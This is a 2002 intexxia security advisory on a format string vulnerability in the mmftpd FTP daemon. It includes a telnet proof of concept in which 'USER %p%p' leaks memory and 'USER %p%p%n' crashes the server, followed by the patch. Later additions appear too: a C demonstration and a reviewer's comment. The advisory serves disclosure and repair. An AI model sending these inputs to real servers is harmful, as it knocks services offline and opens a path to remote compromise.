
[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

by Nikola Strahija on June 12th, 2002

"mmftpd is a secure FTP server that runs as a normal user, and supports virtual users only. Each user may have specific permissions, including the maximum home directory size limit and download/upload speeds. It runs on both BSD and Linux systems, and is ideal for a setup with many Web virtual host customers. It was written from scratch, with no borrowed code."

The intexxia laboratory found a remotely exploitable format string vulnerability in the mmftpd FTP daemon.


DETAILS
=======

There is a format string vulnerability in the 'mmsyslog()'
function of the 'mmftpd' program. This function acts like 'vsyslog()'
if '__GLIBC__' is defined. It calls the 'syslog(3)' function with a
format string that can be defined by a remote user. It is not necessary
to authenticate to exploit this vulnerability.

Successful exploitation of this flaw can allow a remote user to obtain
a local account on the target machine.
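
The double expansion described above, as an added example that is not mmftpd's code: fake_syslog() is a hypothetical stand-in for syslog(3), and the caller's "Failed login for %s" format is an assumption based on the log line in the PROOF OF CONCEPT section. The constructed user name uses "%%", a directive that consumes no argument, so the second parse is visible without reading any memory.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for syslog(3): same "format plus varargs" contract,
 * but the expanded message is kept in last_msg so it can be inspected. */
static char last_msg[1024];

static void fake_syslog(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_msg, sizeof(last_msg), fmt, ap);
    va_end(ap);
}

/* Vulnerable shape: the text built in the first pass is handed to the sink
 * as its format string, so directives inside user data are parsed again. */
static const char *log_vulnerable(const char *fmt, ...)
{
    char buf[1024];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof(buf), fmt, ap);
    va_end(ap);
    fake_syslog(buf);
    return last_msg;
}

/* Fixed shape: the sink's format is a constant and buf is only data. */
static const char *log_fixed(const char *fmt, ...)
{
    char buf[1024];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof(buf), fmt, ap);
    va_end(ap);
    fake_syslog("%s", buf);
    return last_msg;
}

int main(void)
{
    /* Constructed input: "%%" is a directive that consumes no argument. */
    const char *user = "a%%b";
    const char *v = log_vulnerable("Failed login for %s", user);
    printf("vulnerable: %s (altered: %s)\n", v, strstr(v, "%%") ? "no" : "yes");
    printf("fixed:      %s\n", log_fixed("Failed login for %s", user));
    return 0;
}
```

In the vulnerable variant the logged name no longer matches what the client sent, which is the sign that the sink interpreted it as a format.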


________________________________________________________________________


PROOF OF CONCEPT
================

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


________________________________________________________________________


SOLUTION
========

The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
@@ -70,7 +70,7 @@
va_start(lst, fmt);
vsnprintf(buf, 1023, fmt, lst);
va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
}
}
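
Review bot: the changed line `syslog(LOG_NOTICE, "%s", buf);` should carry a short comment stating that buf is already-expanded text that can contain remote input and must only ever be passed as an argument, because nothing in the hunk records why the "%s" is there and a later cleanup could drop it. In the context line `vsnprintf(buf, 1023, fmt, lst);` the literal 1023 depends on a declaration of buf that is outside this hunk; if buf is an array, `sizeof(buf)` would keep the bound tied to it. The hunk covers a single syslog() call, so it is worth confirming that no other call in mmlog.c passes a built buffer as the format; compiling with -Wformat -Wformat-security would flag any that remain.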

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz


________________________________________________________________________


VENDOR STATUS
=============

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew responded quickly and confirmed the
vulnerability. He released a new version.


________________________________________________________________________


LEGALS
======

mmftpd is a registered trademark.


Intexxia provides this information as a public service and "as
is". Intexxia will not be held accountable for any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This document is property of intexxia. Feel
free to use and distribute this material as long as credit is given to
intexxia and the author.


________________________________________________________________________


CONTACT
=======

CERT intexxia [email protected]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80
